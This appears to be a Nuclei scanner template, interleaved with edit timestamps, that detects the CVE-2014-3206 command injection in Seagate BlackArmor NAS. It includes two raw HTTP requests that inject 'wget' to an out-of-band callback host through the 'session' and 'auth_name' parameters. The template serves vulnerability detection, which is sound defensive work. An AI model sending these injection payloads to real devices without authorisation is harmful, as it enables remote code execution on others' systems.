2022-01-10 12:37:23 +00:00
id : CVE-2014-3206
info :
2022-01-11 09:27:24 +00:00
name : Seagate BlackArmor NAS - Command Injection
2022-01-10 12:37:23 +00:00
author : gy741
severity : critical
description : Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2014-3206
- https://www.exploit-db.com/exploits/33159
2022-05-17 09:18:12 +00:00
- https://www.exploit-db.com/exploits/33159/
2022-01-10 12:37:23 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-01-10 12:37:23 +00:00
cve-id : CVE-2014-3206
cwe-id : CWE-20
2023-08-31 11:46:18 +00:00
epss-score : 0.54379
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.9718
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : seagate
product : blackarmor_nas_220_firmware
tags : cve,cve2014,seagate,rce,edb
2022-01-10 12:37:23 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-10 12:37:23 +00:00
- raw :
- |
GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1
Host : {{Hostname}}
Accept : */*
- |
GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1
Host : {{Hostname}}
Accept : */*
unsafe : true
matchers :
- type : word
part : interactsh_protocol
words :
- "http"